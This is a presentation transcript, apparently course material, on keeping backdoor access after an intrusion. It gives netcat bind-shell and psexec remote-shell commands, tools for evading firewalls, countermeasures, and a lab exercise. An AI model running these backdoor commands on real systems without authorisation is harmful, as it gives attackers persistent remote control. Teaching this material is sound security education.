Presentation is loading. Please wait.

Presentation is loading. Please wait.

Remote Control & Backdoor Once administrative access has been gained hackers will maintain access through the backdoor remotely.

Published byHarry Chad Daniels Modified over 8 years ago

Similar presentations

Presentation on theme: "Remote Control & Backdoor Once administrative access has been gained hackers will maintain access through the backdoor remotely."— Presentation transcript:

1 Remote Control & Backdoor Once administrative access has been gained hackers will maintain access through the backdoor remotely

2 Netcat example Nc –L –d –e cmd.exe –p 8080 Nc 192.168.0.13 8080

3 Psexec example Psexec \\192.168.0.13 –u adminlogin –p adminpassword –s cmd.exe\\192.168.0.13

4 GUI remote control Terminal services (check if port 3389 is open) Download winVNC from www.realvnc.com/download.html

5 Port redirection Used to get round firewalls Fpipe from www.foundstone.com

6 Countermeasures Net stop winvnc Winvnc –remove Download reg.exe from resource kit Problem is that remote access has been created using admin rights! Scan for file names and or file name changes Download trip wire www.tripwiresecuirty.comwww.tripwiresecuirty.com Check registry entries HKLM\SOFTWARE and HKEY_USERS\.DEFAULT\SOFTWARE also the RUN hive and startup files (msconfig) Monitor processes (download resource kit kill.exe) Check ports (netstat command and/or fport from www.foundstone.com

7 Exercise Install and run netcat remotely Install and Run fpipe

Download ppt "Remote Control & Backdoor Once administrative access has been gained hackers will maintain access through the backdoor remotely."

Similar presentations

Backdoors, Trojans and Rootkits CIS 413 This presentation is an amalgam of presentations by Mark Michael, Randy Marchany and Ed Skoudis. I have edited.

Backdoors, Trojans and Rootkits CIS 413 This presentation is an amalgam of presentations by Mark Michael, Randy Marchany and Ed Skoudis. I have edited.
Backdoors A backdoor is a program that allows attackers to bypass normal security controls on a system, gaining access on the attacker’s own terms.

Backdoors A backdoor is a program that allows attackers to bypass normal security controls on a system, gaining access on the attacker’s own terms.
Cybersecurity Training in a Virtual Environment By Chinedum Irrechukwu.

Cybersecurity Training in a Virtual Environment By Chinedum Irrechukwu.
Trojans, Backdoors, Rootkits Viruses, and Worms

Trojans, Backdoors, Rootkits Viruses, and Worms
Scanning Determining if the system is alive IP Scanning Port Scanning War Dialing.

Scanning Determining if the system is alive IP Scanning Port Scanning War Dialing.
Week 6-1 Week 6: Trojans and Backdoors What is a Trojan Horse? Overt and Covert.

Week 6-1 Week 6: Trojans and Backdoors What is a Trojan Horse? Overt and Covert.
ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.

ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.
COEN 250 Computer Forensics Windows Life Analysis.

COEN 250 Computer Forensics Windows Life Analysis.
COEN 250 Computer Forensics Windows Life Analysis.

COEN 250 Computer Forensics Windows Life Analysis.
The MS Blaster worm Presented by: Zhi-Wen Ouyang.

The MS Blaster worm Presented by: Zhi-Wen Ouyang.
Jai, 2004 Incident Response & Computer Forensics Chapter 5 Live Data Collection from Windows System Information Networking Security and Assurance Lab National.

Jai, 2004 Incident Response & Computer Forensics Chapter 5 Live Data Collection from Windows System Information Networking Security and Assurance Lab National.
CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Netcat.

CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Netcat.
Front end GUI for PsExec, A fast and easy remote deployment utility.

Front end GUI for PsExec, A fast and easy remote deployment utility.
ROOT KITS. Overview History What is a rootkit? Rootkit capabilities Rootkits on windows OS Rootkit demo Detection methodologies Good tools for detection.

ROOT KITS. Overview History What is a rootkit? Rootkit capabilities Rootkits on windows OS Rootkit demo Detection methodologies Good tools for detection.
Real Forensics The hard way. Data Recovery What data/evidence can you retrieve from a hard drive. Usually dd is good enough Sometimes real help is needed.

Real Forensics The hard way. Data Recovery What data/evidence can you retrieve from a hard drive. Usually dd is good enough Sometimes real help is needed.
Internet Relay Chat Chandrea Dungy Derek Garrett #29.

Internet Relay Chat Chandrea Dungy Derek Garrett #29.
MIS 5211.001 Week 7 Site:

MIS Week 7 Site:
April WebEx Intel ® Active Management Technology (AMT) LANDesk Provisioning LANDesk Server Manager.

April WebEx Intel ® Active Management Technology (AMT) LANDesk Provisioning LANDesk Server Manager.
Windows Systems and Signs of Compromise Prepared By: Rami Al_Khatib and Omar Al_Zyadat Supervised By: Dr. Lo’ai Tawlabeh New York Institute of Technology.

Windows Systems and Signs of Compromise Prepared By: Rami Al_Khatib and Omar Al_Zyadat Supervised By: Dr. Lo’ai Tawlabeh New York Institute of Technology.
1 Objectives Windows Firewalls with Advanced Security Bit-Lock Update and maintain your clients using Windows Server Update Service Microsoft Baseline.

1 Objectives Windows Firewalls with Advanced Security Bit-Lock Update and maintain your clients using Windows Server Update Service Microsoft Baseline.

Similar presentations

Ads by Google